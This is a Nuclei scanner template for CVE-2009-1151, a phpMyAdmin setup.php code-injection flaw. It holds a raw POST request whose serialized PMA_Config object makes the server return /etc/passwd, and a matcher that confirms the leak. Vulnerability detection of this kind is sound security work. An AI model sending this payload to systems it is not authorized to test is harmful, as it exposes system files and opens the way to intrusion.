nuclei-templates/cves/2009/CVE-2009-1151.yaml

37 lines
1.3 KiB
YAML

id: CVE-2009-1151
info:
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
author: princechaddha
severity: high
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
classification:
cve-id: CVE-2009-1151
tags: cve,cve2009,phpmyadmin,rce,deserialization
requests:
- raw:
- |
POST /scripts/setup.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Content-Type: application/x-www-form-urlencoded
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"